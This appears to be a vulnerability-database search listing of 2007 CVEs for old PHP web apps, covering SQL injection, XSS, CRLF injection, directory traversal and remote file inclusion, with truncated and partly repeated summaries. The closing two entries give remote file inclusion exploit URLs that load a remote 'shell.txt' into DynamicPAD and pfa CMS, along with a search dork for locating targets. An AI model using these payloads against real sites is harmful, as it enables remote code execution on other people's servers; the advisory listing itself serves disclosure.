7210 matches found
Crlf injection
CRLF injection vulnerability in index.php in Drake CMS 0.4.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via CRLF sequences in the lang parameter. NOTE: Drake CMS has only a beta version available, and the vendor has previously stated "We d...
CVE-2007-2618
The CVE-2007-2618 issue affects Drake CMS 0.4.0, identifying a CRLF injection vulnerability in index.php. The root cause is a CRLF sequence in the lang parameter that enables an attacker to inject arbitrary HTTP headers and perform HTTP response splitting. Public details describe the vulnerable c...
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in gnuedu 1.3b2 allow remote attackers to execute arbitrary PHP code via a URL in the a ETCDIR parameter to 1 libs/lom.php; 2 lomupdate.php, 3 check-lom.php, and 4 weighkeywords.php in scripts/; the b LIBSDIR parameter to 5 logout.php, 6 help.php...
CVE-2007-2609
CVE-2007-2609 affects gnuedu 1.3b2 with multiple PHP remote file inclusion vulnerabilities . An attacker can trigger arbitrary PHP code execution by supplying untrusted values to the ETCDIR parameter for files/libs (libs/lom.php; lom_update.php; check-lom.php; weigh_keywords.php; web/lom.php) and...
Sql injection
SQL injection vulnerability in index.php in the wfquotes 1.0 0 module for XOOPS allows remote attackers to execute arbitrary SQL commands via the c parameter in a cat action...
CVE-2007-2574
The CVE-2007-2574 entry describes a directory traversal vulnerability in Archangel Weblog 0.90.02, where an attacker can read arbitrary files by supplying a .. (dot dot) path in the index parameter of index.php. This is caused by improper validation of the index parameter, enabling access to file...
CVE-2007-2562
Cross-site scripting XSS vulnerability in index.php in Kayako eSupport 3.00.90 allows remote attackers to inject arbitrary web script or HTML via the m parameter...
Remote file inclusion
PHP remote file inclusion vulnerability in index.php in phpFullAnnu CMS pfa CMS 6.0 allows remote attackers to execute arbitrary PHP code via a URL in the repinc parameter. NOTE: CVE disputes this issue since $repinc is set to a constant value before use...
CVE-2007-2562
Vulnerability summary (CVE-2007-2562) : Kayako eSupport 3.00.90 is affected by a cross-site scripting (XSS) flaw in index.php, exploitable via the _m parameter. The underlying issue is unsanitized input passed through this parameter, allowing remote attackers to inject arbitrary web script or HTM...
CVE-2007-2562
Cross-site scripting XSS vulnerability in index.php in Kayako eSupport 3.00.90 allows remote attackers to inject arbitrary web script or HTML via the m parameter...
CVE-2007-2558
CVE-2007-2558 concerns a PHP remote file inclusion in the web app pfa CMS (phpFullAnnu CMS) version 6.0, specifically in index.php via the repinc parameter. The vulnerability is described as enabling remote PHP code execution through a URL if repinc is used to include code. However, the CVE notes...
Directory traversal
Directory traversal vulnerability in Advanced Guestbook 2.4.2 allows remote attackers to bypass .htaccess settings, and execute arbitrary PHP local files or read arbitrary local templates, via a .. dot dot in a lang cookie, followed by a filename without its .php extension, as demonstrated via a...
CVE-2007-0609
Directory traversal vulnerability in Advanced Guestbook 2.4.2 allows remote attackers to bypass .htaccess settings, and execute arbitrary PHP local files or read arbitrary local templates, via a .. dot dot in a lang cookie, followed by a filename without its .php extension, as demonstrated via a...
CVE-2007-2548
Unspecified vulnerability in index.php in TurnkeyWebTools SunShop Shopping Cart 4.0 has unknown impact and an l remote attack vector, related to "Cookie Manipulation."...
CVE-2007-2548
Summary: CVE-2007-2548 concerns TurnkeyWebTools SunShop Shopping Cart 4.0 with an issue in index.php described as a vulnerability tied to cookie manipulation and a remote attack vector . The exact impact is listed as unknown in the description. The available data indicate a remote, low-complexity...
CVE-2007-2548
Unspecified vulnerability in index.php in TurnkeyWebTools SunShop Shopping Cart 4.0 has unknown impact and an l remote attack vector, related to "Cookie Manipulation."...
CVE-2007-2549
CVE-2007-2549 affects TurnKeyWebTools SunShop Shopping Cart 4.0. SQL injection in index.php via the (1) c or (2) quantity parameter allows remote attackers to execute arbitrary SQL commands. Root cause is unsanitized input in index.php that enables SQL commands to reach the database. The connecte...
CVE-2007-2527
The CVE affects DynamicPAD prior to version 1.03.31. It exposes multiple PHP remote file inclusion vulnerabilities that allow an attacker to execute arbitrary PHP code by supplying a crafted URL in the HomeDir parameter to either dp_logs.php or index.php. The underlying issue is a remote file inc...
DynamicPAD <= 1.02.18 (HomeDir) Remote File Inclusion Vulnerabilities
No description provided by source. DynamicPAD Remote file inclusion HomeDir Download script : http://dynamicpad.org/dp.tar.gz Thanks Str0ke Dork : "Powered By DynamicPAD" Exploit : http://victim.com/dppath/dplogs.php?HomeDir=shell.txt? http://victom.com/dppath/index.php?HomeDir= shell.txt?...
pfacms-rfi.txt
pfa CMS v6.0 // AYYILDIZ.ORG Gururla Sunar ! = OZELHAREKAT Author: iLker Kandemir ScriptSite: http://pfa.netsliver.com/downloadpfa Tnx: H0tturk,Ekin0x,Dumenci,Gencnesil,Gencturk,Str0ke Exploit: http://site/pfapath/index.php?repinc=http://shell.txt?...